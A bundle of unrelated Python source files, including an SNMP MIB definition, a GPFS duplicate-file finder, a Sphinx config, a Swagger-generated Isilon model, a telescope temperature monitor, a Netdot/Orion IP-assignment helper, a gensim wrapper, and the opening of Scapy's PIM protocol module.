ngwasyncTrapInfo = MibIdentifier((1, 3, 6, 1, 4, 1, 922, 2, 1, 2))
ngwasyncGatewayName = MibScalar((1, 3, 6, 1, 4, 1, 922, 2, 1, 1, 1), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ngwasyncGatewayName.setStatus('mandatory')
ngwasyncUptime = MibScalar((1, 3, 6, 1, 4, 1, 922, 2, 1, 1, 2), TimeTicks()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ngwasyncUptime.setStatus('mandatory')
ngwasyncGroupWiseLink = MibScalar((1, 3, 6, 1, 4, 1, 922, 2, 1, 1, 3), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 5))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ngwasyncGroupWiseLink.setStatus('mandatory')
ngwasyncFrgnLink = MibScalar((1, 3, 6, 1, 4, 1, 922, 2, 1, 1, 4), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 5))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ngwasyncFrgnLink.setStatus('mandatory')
ngwasyncOutBytes = MibScalar((1, 3, 6, 1, 4, 1, 922, 2, 1, 1, 5), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ngwasyncOutBytes.setStatus('mandatory')
ngwasyncInBytes = MibScalar((1, 3, 6, 1, 4, 1, 922, 2, 1, 1, 6), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ngwasyncInBytes.setStatus('mandatory')
ngwasyncOutMsgs = MibScalar((1, 3, 6, 1, 4, 1, 922, 2, 1, 1, 7), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ngwasyncOutMsgs.setStatus('mandatory')
ngwasyncInMsgs = MibScalar((1, 3, 6, 1, 4, 1, 922, 2, 1, 1, 8), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ngwasyncInMsgs.setStatus('mandatory')
ngwasyncOutStatuses = MibScalar((1, 3, 6, 1, 4, 1, 922, 2, 1, 1, 9), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ngwasyncOutStatuses.setStatus('mandatory')
ngwasyncInStatuses = MibScalar((1, 3, 6, 1, 4, 1, 922, 2, 1, 1, 10), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ngwasyncInStatuses.setStatus('mandatory')
ngwasyncOutErrors = MibScalar((1, 3, 6, 1, 4, 1, 922, 2, 1, 1, 11), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ngwasyncOutErrors.setStatus('mandatory')
ngwasyncInErrors = MibScalar((1, 3, 6, 1, 4, 1, 922, 2, 1, 1, 12), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ngwasyncInErrors.setStatus('mandatory')
ngwasyncTrapTime = MibScalar((1, 3, 6, 1, 4, 1, 922, 2, 1, 2, 1), Integer32())
if mibBuilder.loadTexts: ngwasyncTrapTime.setStatus('mandatory')
ngwasyncStartTrap = NotificationType((1, 3, 6, 1, 4, 1, 922, 2, 1, 1) + (0,1)).setObjects(("NGWASYNC", "ngwasyncTrapTime"), ("NGWASYNC", "ngwasyncGatewayName"))
ngwasyncStopTrap = NotificationType((1, 3, 6, 1, 4, 1, 922, 2, 1, 1) + (0,2)).setObjects(("NGWASYNC", "ngwasyncTrapTime"), ("NGWASYNC", "ngwasyncGatewayName"))
ngwasyncRestartTrap = NotificationType((1, 3, 6, 1, 4, 1, 922, 2, 1, 1) + (0,3)).setObjects(("NGWASYNC", "ngwasyncTrapTime"), ("NGWASYNC", "ngwasyncGatewayName"))
ngwasyncGroupWiseLinkTrap = NotificationType((1, 3, 6, 1, 4, 1, 922, 2, 1, 1) + (0,4)).setObjects(("NGWASYNC", "ngwasyncTrapTime"), ("NGWASYNC", "ngwasyncGatewayName"))
mibBuilder.exportSymbols("NGWASYNC", gateways=gateways, ngwasyncInErrors=ngwasyncInErrors, ngwasyncOutBytes=ngwasyncOutBytes, wpcorp=wpcorp, ngwasyncGroupWiseLinkTrap=ngwasyncGroupWiseLinkTrap, ngwasync=ngwasync, ngwasyncOutErrors=ngwasyncOutErrors, ngwasyncInfo=ngwasyncInfo, ngwasyncOutMsgs=ngwasyncOutMsgs, ngwasyncInBytes=ngwasyncInBytes, ngwasyncFrgnLink=ngwasyncFrgnLink, ngwasyncGatewayName=ngwasyncGatewayName, ngwasyncInMsgs=ngwasyncInMsgs, ngwasyncUptime=ngwasyncUptime, ngwasyncGroupWiseLink=ngwasyncGroupWiseLink, ngwasyncStopTrap=ngwasyncStopTrap, ngwasyncStartTrap=ngwasyncStartTrap, ngwasyncTrapInfo=ngwasyncTrapInfo, ngwasyncOutStatuses=ngwasyncOutStatuses, ngwasyncInStatuses=ngwasyncInStatuses, ngwasyncRestartTrap=ngwasyncRestartTrap, ngwasyncTrapTime=ngwasyncTrapTime)
|
#!/usr/bin/env python2.7
"""Identify files which contain the same data (duplicates) based on md5sum of file
Caveats:
- This method is likely to be quite slow and resource heavy
- Empty files will be listed as duplicates of each other.
- Python's 'open' method follows symlinks, so they wil be identified as duplicates
- Files that can't be read for whatever reason (e.g. permission denied) will be skipped
"""
from __future__ import print_function
import hashlib
from arcapix.fs.gpfs import ManagementPolicy, MapReduceRule
# method to calculate md5sum of a file
def md5sum(filename, blocksize=65536):
hash = hashlib.md5()
try:
with open(filename, "rb") as f:
for block in iter(lambda: f.read(blocksize), b""):
hash.update(block)
except:
# exclude any files that can't be read
return None
return hash.hexdigest()
# build dict of format: (hash, [list, of, paths])
def reducefn(x, y):
for k, v in y.items():
if k is None:
# couldn't md5sum file -> skip
continue
x.setdefault(k, []).extend(v)
return x
# yield lists containing duplicates
def output(out):
for v in out.items():
if len(v) > 1:
yield v
# create policy
p = ManagementPolicy()
# create MapReduceRule with relevant processing methods
r = p.rules.new(MapReduceRule, 'duplicates',
mapfn=lambda f: {md5sum(f.path): [f.path]},
reducefn=reducefn, output=output, initial={})
# set 'SHOW' clause to only include fields we're interested in (path)
# this can give a slight speed/efficiency boost
r.change(show=r.show_performance())
# run policy against filesystem 'mmfs1'
res = p.run('mmfs1')['duplicates']
# print formatted results
for item in res:
print(", ".join(item), '\n')
# $ python find_duplicate_files.py
#/mmfs1/.policytmp/pdtest-b81839f8-13909.A590830A.0, /mmfs1/.policytmp/pdtest-7a781e4a-13909.A590830A.0.out
#
#/mmfs1/.policytmp/apsync.list.d70aac39.0, /mmfs1/.policytmp/apsync.list.bfeb0b4e.0
#
#/mmfs1/logs/2016/12/12/11/condor-45.err, /mmfs1/logs/2016/12/08/10/condor-42.err,
#/mmfs1/logs/2016/12/08/10/condor-43.err, /mmfs1/logs/2016/12/08/12/condor-44.err
|
# Configuration file for the Sphinx documentation builder.
#
# This file only contains a selection of the most common options. For a full
# list see the documentation:
# https://www.sphinx-doc.org/en/master/usage/configuration.html
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
sys.path.insert(0, os.path.abspath('../../../'))
sys.path.insert(0, os.path.abspath('../../../macrosynergy'))
print(sys.path)
from setup import VERSION, ISRELEASED
import qstools
# sys.path.insert(0, os.path.abspath("_themes"))
# -- Project information -----------------------------------------------------
project = 'JPMAQS'
copyright = 'Copyright 2020 Macrosynergy Ltd'
author = 'Macrosynergy'
version = VERSION if ISRELEASED else f"{VERSION:s}.dev"
release = VERSION if ISRELEASED else f"{VERSION:s}.dev"
# -- General configuration ---------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.intersphinx',
'sphinx.ext.todo',
'sphinx.ext.viewcode',
'sphinx.ext.mathjax',
'sphinx.ext.autodoc',
'sphinx.ext.napoleon'
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = ["_build"]
source_suffix = ".rst"
master_doc = "index"
# The reST default role (used for this markup: `text`) to use for all
# documents.
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
add_function_parentheses = False
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
# show_authors = False
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
# keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'sphinx_rtd_theme'
# html_theme = 'sphinxdoc'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If true, the index is split into individual pages for each letter.
# html_split_index = False
# If true, links to the reST sources are added to the pages.
html_show_sourcelink = False
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
html_show_sphinx = False
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
html_show_copyright = True
# Output file base name for HTML help builder.
htmlhelp_basename = "qstoolsdoc"
|
# coding: utf-8
"""
Isilon SDK
Isilon SDK - Language bindings for the OneFS API # noqa: E501
OpenAPI spec version: 4
Contact: sdk@isilon.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class ClusterOwner(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'company': 'str',
'location': 'str',
'primary_email': 'str',
'primary_name': 'str',
'primary_phone1': 'str',
'primary_phone2': 'str',
'secondary_email': 'str',
'secondary_name': 'str',
'secondary_phone1': 'str',
'secondary_phone2': 'str'
}
attribute_map = {
'company': 'company',
'location': 'location',
'primary_email': 'primary_email',
'primary_name': 'primary_name',
'primary_phone1': 'primary_phone1',
'primary_phone2': 'primary_phone2',
'secondary_email': 'secondary_email',
'secondary_name': 'secondary_name',
'secondary_phone1': 'secondary_phone1',
'secondary_phone2': 'secondary_phone2'
}
def __init__(self, company=None, location=None, primary_email=None, primary_name=None, primary_phone1=None, primary_phone2=None, secondary_email=None, secondary_name=None, secondary_phone1=None, secondary_phone2=None): # noqa: E501
"""ClusterOwner - a model defined in Swagger""" # noqa: E501
self._company = None
self._location = None
self._primary_email = None
self._primary_name = None
self._primary_phone1 = None
self._primary_phone2 = None
self._secondary_email = None
self._secondary_name = None
self._secondary_phone1 = None
self._secondary_phone2 = None
self.discriminator = None
if company is not None:
self.company = company
if location is not None:
self.location = location
if primary_email is not None:
self.primary_email = primary_email
if primary_name is not None:
self.primary_name = primary_name
if primary_phone1 is not None:
self.primary_phone1 = primary_phone1
if primary_phone2 is not None:
self.primary_phone2 = primary_phone2
if secondary_email is not None:
self.secondary_email = secondary_email
if secondary_name is not None:
self.secondary_name = secondary_name
if secondary_phone1 is not None:
self.secondary_phone1 = secondary_phone1
if secondary_phone2 is not None:
self.secondary_phone2 = secondary_phone2
@property
def company(self):
"""Gets the company of this ClusterOwner. # noqa: E501
Cluster owner company name. # noqa: E501
:return: The company of this ClusterOwner. # noqa: E501
:rtype: str
"""
return self._company
@company.setter
def company(self, company):
"""Sets the company of this ClusterOwner.
Cluster owner company name. # noqa: E501
:param company: The company of this ClusterOwner. # noqa: E501
:type: str
"""
self._company = company
@property
def location(self):
"""Gets the location of this ClusterOwner. # noqa: E501
Cluster owner location. # noqa: E501
:return: The location of this ClusterOwner. # noqa: E501
:rtype: str
"""
return self._location
@location.setter
def location(self, location):
"""Sets the location of this ClusterOwner.
Cluster owner location. # noqa: E501
:param location: The location of this ClusterOwner. # noqa: E501
:type: str
"""
self._location = location
@property
def primary_email(self):
"""Gets the primary_email of this ClusterOwner. # noqa: E501
Cluster owner primary email address. # noqa: E501
:return: The primary_email of this ClusterOwner. # noqa: E501
:rtype: str
"""
return self._primary_email
@primary_email.setter
def primary_email(self, primary_email):
"""Sets the primary_email of this ClusterOwner.
Cluster owner primary email address. # noqa: E501
:param primary_email: The primary_email of this ClusterOwner. # noqa: E501
:type: str
"""
self._primary_email = primary_email
@property
def primary_name(self):
"""Gets the primary_name of this ClusterOwner. # noqa: E501
Cluster owner primary contact name. # noqa: E501
:return: The primary_name of this ClusterOwner. # noqa: E501
:rtype: str
"""
return self._primary_name
@primary_name.setter
def primary_name(self, primary_name):
"""Sets the primary_name of this ClusterOwner.
Cluster owner primary contact name. # noqa: E501
:param primary_name: The primary_name of this ClusterOwner. # noqa: E501
:type: str
"""
self._primary_name = primary_name
@property
def primary_phone1(self):
"""Gets the primary_phone1 of this ClusterOwner. # noqa: E501
Cluster owner primary contact phone number 1. # noqa: E501
:return: The primary_phone1 of this ClusterOwner. # noqa: E501
:rtype: str
"""
return self._primary_phone1
@primary_phone1.setter
def primary_phone1(self, primary_phone1):
"""Sets the primary_phone1 of this ClusterOwner.
Cluster owner primary contact phone number 1. # noqa: E501
:param primary_phone1: The primary_phone1 of this ClusterOwner. # noqa: E501
:type: str
"""
self._primary_phone1 = primary_phone1
@property
def primary_phone2(self):
"""Gets the primary_phone2 of this ClusterOwner. # noqa: E501
Cluster owner primary contact phone number 2. # noqa: E501
:return: The primary_phone2 of this ClusterOwner. # noqa: E501
:rtype: str
"""
return self._primary_phone2
@primary_phone2.setter
def primary_phone2(self, primary_phone2):
"""Sets the primary_phone2 of this ClusterOwner.
Cluster owner primary contact phone number 2. # noqa: E501
:param primary_phone2: The primary_phone2 of this ClusterOwner. # noqa: E501
:type: str
"""
self._primary_phone2 = primary_phone2
@property
def secondary_email(self):
"""Gets the secondary_email of this ClusterOwner. # noqa: E501
Cluster owner secondary email address. # noqa: E501
:return: The secondary_email of this ClusterOwner. # noqa: E501
:rtype: str
"""
return self._secondary_email
@secondary_email.setter
def secondary_email(self, secondary_email):
"""Sets the secondary_email of this ClusterOwner.
Cluster owner secondary email address. # noqa: E501
:param secondary_email: The secondary_email of this ClusterOwner. # noqa: E501
:type: str
"""
self._secondary_email = secondary_email
@property
def secondary_name(self):
"""Gets the secondary_name of this ClusterOwner. # noqa: E501
Cluster owner secondary contact name. # noqa: E501
:return: The secondary_name of this ClusterOwner. # noqa: E501
:rtype: str
"""
return self._secondary_name
@secondary_name.setter
def secondary_name(self, secondary_name):
"""Sets the secondary_name of this ClusterOwner.
Cluster owner secondary contact name. # noqa: E501
:param secondary_name: The secondary_name of this ClusterOwner. # noqa: E501
:type: str
"""
self._secondary_name = secondary_name
@property
def secondary_phone1(self):
"""Gets the secondary_phone1 of this ClusterOwner. # noqa: E501
Cluster owner secondary contact phone number 1. # noqa: E501
:return: The secondary_phone1 of this ClusterOwner. # noqa: E501
:rtype: str
"""
return self._secondary_phone1
@secondary_phone1.setter
def secondary_phone1(self, secondary_phone1):
"""Sets the secondary_phone1 of this ClusterOwner.
Cluster owner secondary contact phone number 1. # noqa: E501
:param secondary_phone1: The secondary_phone1 of this ClusterOwner. # noqa: E501
:type: str
"""
self._secondary_phone1 = secondary_phone1
@property
def secondary_phone2(self):
"""Gets the secondary_phone2 of this ClusterOwner. # noqa: E501
Cluster owner secondary contact phone number 2. # noqa: E501
:return: The secondary_phone2 of this ClusterOwner. # noqa: E501
:rtype: str
"""
return self._secondary_phone2
@secondary_phone2.setter
def secondary_phone2(self, secondary_phone2):
"""Sets the secondary_phone2 of this ClusterOwner.
Cluster owner secondary contact phone number 2. # noqa: E501
:param secondary_phone2: The secondary_phone2 of this ClusterOwner. # noqa: E501
:type: str
"""
self._secondary_phone2 = secondary_phone2
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ClusterOwner):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
from . import m_module_template
class MicroarrayGeneMapping(m_module_template.MicroarrayModule):
def __init__(self, owner):
self.owner = owner
def add_tag(self):
self.data = None #Fake
def map_gene(self):
self.data = None #Fake
def merge_different_platform_data(self):
self.data = None #Fake
|
#!/usr/bin/env python
"""Monitor BOSS temperatures and LN2 levels
History:
2012-04-23 Elena Malanushenko, converted from a script to a window by Russell Owen
2012-06-04 ROwen Fix clear button.
2015-11-03 ROwen Replace "== None" with "is None" and "!= None" with "is not None" to modernize the code.
"""
import Tkinter
import matplotlib
import RO.Wdg
import TUI.Base.StripChartWdg
import TUI.Models
WindowName = "Inst.BOSS Monitor"
def addWindow(tlSet):
"""Create the window for TUI.
"""
tlSet.createToplevel(
name = WindowName,
defGeom = "+434+33",
visible = False,
resizable = True,
wdgFunc = BOSSTemperatureMonitorWdg,
)
class BOSSTemperatureMonitorWdg(Tkinter.Frame):
def __init__(self, master, timeRange=1800, width=8, height=4):
"""Create a BOSSTemperatureMonitorWdg
Inputs:
- master: parent Tk widget
- timeRange: range of time displayed (seconds)
- width: width of plot (inches)
- height: height of plot (inches)
"""
Tkinter.Frame.__init__(self, master)
self.bossModel = TUI.Models.getModel("boss")
self.stripChartWdg = TUI.Base.StripChartWdg.StripChartWdg(
master = self,
timeRange = timeRange,
numSubplots = 2,
width = width,
height = height,
cnvTimeFunc = TUI.Base.StripChartWdg.TimeConverter(useUTC=True),
)
self.stripChartWdg.grid(row=0, column=0, sticky="nwes")
self.grid_rowconfigure(0, weight=1)
self.grid_columnconfigure(0, weight=1)
# the default ticks are not nice, so be explicit
self.stripChartWdg.xaxis.set_major_locator(matplotlib.dates.MinuteLocator(byminute=range(0, 61, 5)))
self.cameraNameList = (
"sp1r0",
"sp1b2",
# "sp2r0",
# "sp2b2",
)
self.cameraNameColorDict = {
"sp1r0": "red",
"sp1b2": "green",
# "sp2r0": "blue",
# "sp2b2": "black",
}
self.nomTempColorDict = dict() # dict of camera name: color
self.nomTempLineDict = dict() # dict of camera name: nominal temperature line (if present)
self.readTempLineDict = dict() # dict of camera name: read temperature line
for cameraName in self.cameraNameList:
self.addTemperatureLines(cameraName)
self.stripChartWdg.showY(-140.0, -90.0, subplotInd=0)
self.stripChartWdg.subplotArr[0].legend(loc=3, frameon=False)
self.stripChartWdg.subplotArr[0].yaxis.set_label_text("CCDTemp (C)")
self.stripChartWdg.plotKeyVar(
label = "sp1",
subplotInd = 1,
keyVar = self.bossModel.SP1SecondaryDewarPress,
keyInd = 0,
color = "blue",
)
# self.stripChartWdg.plotKeyVar(
# label = "sp2",
# subplotInd = 1,
# keyVar = self.bossModel.SP2SecondaryDewarPress,
# keyInd = 0,
# color = "red",
# )
self.stripChartWdg.addConstantLine(10.0, subplotInd=1, color="grey")
self.stripChartWdg.showY(0.1, 10.5, subplotInd=1)
self.stripChartWdg.subplotArr[1].legend(loc=3, frameon=False)
self.stripChartWdg.subplotArr[1].yaxis.set_label_text("Ln2 Pressure")
self.clearWdg = RO.Wdg.Button(master = self, text = "C", callFunc = self.clearCharts)
self.clearWdg.grid(row=0, column=0, sticky = "sw")
def addTemperatureLines(self, cameraName):
"""Add read temperature line for a given camera; does not check if it already exists
Also sets a callback for nominal temperature to draw a constant line
"""
uprCameraName = cameraName.upper()
tempNomKeyVar = getattr(self.bossModel, "%sCCDTempNom" % (uprCameraName,))
def callFunc(keyVar, self=self, cameraName=cameraName):
self.nomTempCallback(keyVar, cameraName=cameraName)
tempNomKeyVar.addCallback(callFunc)
tempReadKeyVar = getattr(self.bossModel, "%sCCDTempRead" % (uprCameraName,))
color = self.cameraNameColorDict[cameraName]
line = self.stripChartWdg.plotKeyVar(
label = cameraName,
subplotInd = 0,
keyVar = tempReadKeyVar,
keyInd = 0,
color = color,
)
self.readTempLineDict[cameraName] = line
return line
def clearCharts(self, wdg=None):
"""Clear all strip charts
"""
self.stripChartWdg.clear()
def nomTempCallback(self, keyVar, cameraName):
"""Draw a constant line for a new value of a nominal temperature
"""
color = self.cameraNameColorDict[cameraName]
line = self.nomTempLineDict.pop(cameraName, None)
if line:
self.stripChartWdg.removeLine(line)
nomTemp = keyVar[0]
if nomTemp is None:
return
line = self.stripChartWdg.addConstantLine(
nomTemp,
color = color,
linestyle = "--",
)
self.nomTempLineDict[cameraName] = line
readLine = self.readTempLineDict[cameraName]
readLine.line2d.set_label("%s (%0.1f)" % (cameraName, nomTemp))
self.stripChartWdg.subplotArr[0].legend(loc=3, frameon=False)
if __name__ == "__main__":
import TestData
addWindow(TestData.tuiModel.tlSet)
TestData.tuiModel.tlSet.makeVisible(WindowName)
# TestData.runTest()
TestData.tuiModel.reactor.run()
|
import torch
def inv_softplus(x):
return x + torch.log(-torch.expm1(-x))
def inv_sigmoid(x):
return torch.log(x) - torch.log(1 - x)
|
# This class uses API to interact with netdot and Saolarwind Orion NPm server
import re
import requests
from orionsdk import SwisClient
import pynetdot
import ipaddress
import ipaddr
__author__ = "Paul S.I. Basondole"
__version__ = "Code 2.0 Python 3.7"
__maintainer__ = "Paul S.I. Basondole"
__email__ = "bassosimons@me.com"
class NetdotOrionServers():
def __init__(self,username,password):
self.username = username
self.password = password
def getFromNetdot(self,netdot_url,residentblocks):
# login to netdot
pynetdot.setup(url=netdot_url,username=self.username,password=self.password)
# search netdot for resident block and get its used subnets
usedSubnetList = [] # list to record used ip subnets from netdot
try:
for residentblock in residentblocks:
for block in pynetdot.Ipblock.search(address=residentblock):
for ip in block.children:
usedSubnetList.append(ip.address+"/"+str(ip.prefix))
except requests.exceptions.MissingSchema: return AttributeError # if the URL is not valid
except AttributeError: return AttributeError # if credentials are wrong
except requests.exceptions.ConnectionError: return AttributeError # used to raise a dialog for connection issues
except Exception as e: return e
#create a list of all /30 from the resident blocks
allSlash30List = [ip for residentblock in residentblocks for ip in ipaddr.IPNetwork(residentblock).subnet(new_prefix=30)]
#convert list elements to ip network objects
usedSubnetList = [ipaddress.ip_network(item) for item in usedSubnetList]
allSlash30List = [ipaddress.ip_network(item) for item in allSlash30List]
# iterate through allSlash30List to check if an item in allSlash30List
# is a subnet of any item in usedSubnetList
# if not, the item becomes the assigned ip
for proposedIPNet in allSlash30List:
for usedIPNet in usedSubnetList:
if proposedIPNet.subnet_of(usedIPNet):
# move to the next proposed_net
break
else:
if str(usedIPNet) != str(usedSubnetList[-1]):
# skip the used_net until the last used_net, makes sure we have scanned the proposed_net against all used_net
continue
else:
return proposedIPNet
return False # no ip address found from netdot
def saveToNetdot(self,netdotURL,assignedIPNet,service_description=''):
''' Saves the assigned IP to netdot database'''
# login to netdot
pynetdot.setup(url=netdotURL,username=self.username,password=self.password)
record = pynetdot.Ipblock()
record.address = assignedIPNet
record.description = service_description
record.status = 5
# status options
# container = 0
# container = 1
# dicvovered = 2
# reserved = 4
# subnet = 5
try:
saved_status = record.save()
if saved_status == True: return True
else: return False
except requests.exceptions.HTTPError: return AttributeError
except requests.exceptions.MissingSchema: return AttributeError # if the URL is not valid
except AttributeError: return AttributeError # if credentials are wrong
except Exception as e: return str(type(e))+'\n'+str(e)
def addNodeToOrion(self,orion_server,client_address,service_description='',engine_id=3):
# disable SSL warnings
requests.packages.urllib3.disable_warnings()
# connect to orion API port=17778
npm = SwisClient(orion_server, self.username, self.password)
# define node properties
# EngineID can be found in the solarwind orion database server
props = {'IPAddress': client_address,
'ObjectSubType': 'ICMP',
'EngineID': engine_id,
'NodeName': service_description}
# add the node
try :
record = npm.create('Orion.Nodes', **props)
#extract the node id
nodeid = re.findall(r'(\d+)$',record)[0]
#enable ICMP polling
pollers_enabled = {'N.Status.ICMP.Native': True,
'N.ResponseTime.ICMP.Native': True}
# define pollers properties in a dictionary and create a list of those dicts
pollers_props = []
for poller in pollers_enabled:
pollers_props.append({'PollerType': poller,
'NetObject': 'N:' + nodeid,
'NetObjectType': 'N',
'NetObjectID': nodeid,
'Enabled': pollers_enabled[poller]})
# update the pollers in orion
for pollers in pollers_props: npm.create('Orion.Pollers', **pollers)
# poll the node
npm.invoke('Orion.Nodes', 'PollNow', 'N:' + nodeid)
return True
except ConnectionError: return ConnectionError
except requests.exceptions.HTTPError: return AttributeError # wrong credentials
except Exception as e: return '%s\n%s' %(str(type(e)),str(e))
|
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community
Edition) available.
Copyright (C) 2017-2021 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
RESOURCE_FILEDS = ["labels", "annotations"]
RESOURCE_KINDS_FOR_MONITOR_INJECTOR = ["Service", "Deployment", "StatefulSet", "Job", "DaemonSet"]
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2011 Radim Rehurek <radimrehurek@seznam.cz>
# Licensed under the GNU LGPL v2.1 - http://www.gnu.org/licenses/lgpl.html
"""
Scikit learn interface for gensim for easy use of gensim with scikit-learn
Follows scikit-learn API conventions
"""
import numpy as np
from sklearn.base import TransformerMixin, BaseEstimator
from sklearn.exceptions import NotFittedError
from gensim import models
from gensim.sklearn_integration import BaseSklearnWrapper
class SklRpModel(BaseSklearnWrapper, TransformerMixin, BaseEstimator):
"""
Base RP module
"""
def __init__(self, id2word=None, num_topics=300):
"""
Sklearn wrapper for RP model. Class derived from gensim.models.RpModel.
"""
self.gensim_model = None
self.id2word = id2word
self.num_topics = num_topics
def get_params(self, deep=True):
"""
Returns all parameters as dictionary.
"""
return {"id2word": self.id2word, "num_topics": self.num_topics}
def set_params(self, **parameters):
"""
Set all parameters.
"""
super(SklRpModel, self).set_params(**parameters)
return self
def fit(self, X, y=None):
"""
Fit the model according to the given training data.
Calls gensim.models.RpModel
"""
self.gensim_model = models.RpModel(corpus=X, id2word=self.id2word, num_topics=self.num_topics)
return self
def transform(self, docs):
"""
Take documents/corpus as input.
Return RP representation of the input documents/corpus.
The input `docs` can correspond to multiple documents like : [ [(0, 1.0), (1, 1.0), (2, 1.0)], [(0, 1.0), (3, 1.0), (4, 1.0), (5, 1.0), (6, 1.0), (7, 1.0)] ]
or a single document like : [(0, 1.0), (1, 1.0), (2, 1.0)]
"""
if self.gensim_model is None:
raise NotFittedError("This model has not been fitted yet. Call 'fit' with appropriate arguments before using this method.")
# The input as array of array
check = lambda x: [x] if isinstance(x[0], tuple) else x
docs = check(docs)
X = [[] for _ in range(0, len(docs))]
for k, v in enumerate(docs):
transformed_doc = self.gensim_model[v]
probs_docs = list(map(lambda x: x[1], transformed_doc))
# Everything should be equal in length
if len(probs_docs) != self.num_topics:
probs_docs.extend([1e-12] * (self.num_topics - len(probs_docs)))
X[k] = probs_docs
return np.reshape(np.array(X), (len(docs), self.num_topics))
def partial_fit(self, X):
raise NotImplementedError("'partial_fit' has not been implemented for SklRpModel")
|
# This file is part of Scapy
# Scapy is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# any later version.
#
# Scapy is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Scapy. If not, see <http://www.gnu.org/licenses/>.
#
# scapy.contrib.description = Protocol Independent Multicast (PIM)
# scapy.contrib.status = loads
"""
References:
- https://tools.ietf.org/html/rfc4601
- https://www.iana.org/assignments/pim-parameters/pim-parameters.xhtml
"""
import struct
from scapy.packet import Packet, bind_layers
from scapy.fields import BitFieldLenField, BitField, BitEnumField, ByteField, \
ShortField, XShortField, IPField, PacketListField, \
IntField, FieldLenField, BoundStrLenField, FlagsField
from scapy.layers.inet import IP
from scapy.utils import checksum
from scapy.compat import orb
from scapy.config import conf
from scapy.volatile import RandInt
PIM_TYPE = {
0: "Hello",
1: "Register",
2: "Register-Stop",
3: "Join/Prune",
4: "Bootstrap",
5: "Assert",
6: "Graft",
7: "Graft-Ack",
8: "Candidate-RP-Advertisement"
}
class PIMv2Hdr(Packet):
name = "Protocol Independent Multicast Version 2 Header"
fields_desc = [BitField("version", 2, 4),
BitEnumField("type", 0, 4, PIM_TYPE),
ByteField("reserved", 0),
XShortField("chksum", None)]
def post_build(self, p, pay):
"""
Called implicitly before a packet is sent to compute and
place PIM checksum.
Parameters:
self The instantiation of an PIMv2Hdr class
p The PIMv2Hdr message in hex in network byte order
pay Additional payload for the PIMv2Hdr message
"""
p += pay
if self.chksum is None:
ck = checksum(p)
p = p[:2] + struct.pack("!H", ck) + p[4:]
return p
def _guess_pim_tlv_class(h_classes, default_key, pkt, **kargs):
cls = conf.raw_layer
